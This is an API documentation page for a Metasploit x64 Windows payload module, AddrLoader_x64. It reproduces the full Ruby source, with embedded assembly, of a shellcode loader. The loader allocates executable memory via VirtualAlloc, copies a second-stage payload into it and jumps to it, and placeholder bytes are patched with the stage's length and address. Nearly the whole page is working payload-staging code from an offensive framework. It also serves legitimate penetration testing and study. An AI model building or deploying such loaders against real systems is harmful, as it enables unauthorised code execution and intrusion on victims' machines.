Module: Msf::Payload::Windows::AddrLoader_x64

Includes:
Msf::Payload::Windows, BlockApi_x64
Defined in:
lib/msf/core/payload/windows/x64/addr_loader.rb

Overview

Windows ARCH_X64 loader

Instance Method Summary collapse

Methods included from BlockApi_x64

#asm_block_api

Methods included from Msf::Payload::Windows

#apply_prepends, exit_types, #handle_intermediate_stage, #include_send_uuid, #initialize, #replace_var

Methods included from PrependMigrate

#apply_prepend_migrate, #initialize, #prepend_migrate, #prepend_migrate?, #prepend_migrate_64

Instance Method Details

#asm_block_loaderObject 



35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
 
# File 'lib/msf/core/payload/windows/x64/addr_loader.rb', line 35

def asm_block_loader
  asm = %Q^
      call after_len          ; Call after_addr, this pushes the length onto the stack
      db 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41
    after_len:
      pop rsi                 ; RSI = len
      mov rsi, [rsi]

      mov esi, esi            ; only use the lower-order 32 bits for the size
      push 0x40               ;
      pop r9                  ; PAGE_EXECUTE_READWRITE
      push 0x1000             ;
      pop r8                  ; MEM_COMMIT
      mov rdx, rsi            ; the newly received second stage length.
      xor rcx, rcx            ; NULL as we dont care where the allocation is.
      mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
      call rbp                ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
      ; Receive the second stage and execute it...
      mov rbx, rax            ; rbx = our new memory address for the new stage
      mov r15, rax            ; save the address so we can jump into it later

      call after_addr         ; Call after_addr, this pushes the address onto the stack.
      db 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42
    after_addr:
      pop rdi                 ; EDI = addr
      mov rdi, [rdi]

    copy_memory:
      mov rdx, [rdi]
      mov [rbx], rdx
      add rbx, 8
      add rdi, 8
      sub rsi, 8
      test rsi,rsi
      jnz copy_memory

    execute_stage:
      jmp r15                 ; dive into the stored stage address

  ^
  asm
end

#generate_loaderObject

Generate and compile the loader



19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
 
# File 'lib/msf/core/payload/windows/x64/addr_loader.rb', line 19

def generate_loader
  combined_asm = %Q^
      cld                    ; Clear the direction flag.
      and rsp, ~0xF          ;  Ensure RSP is 16 byte aligned
      call start             ; Call start, this pushes the address of 'api_call' onto the stack.
      #{asm_block_api}
    start:
      pop rbp
      #{asm_block_loader}
  ^
  loader = Metasm::Shellcode.assemble(Metasm::X64.new, combined_asm).encode_string
  offset_size = loader.index("AAAAAAAA")
  offset_addr = loader.index("BBBBBBBB")
  [ loader, offset_addr, offset_size ]
end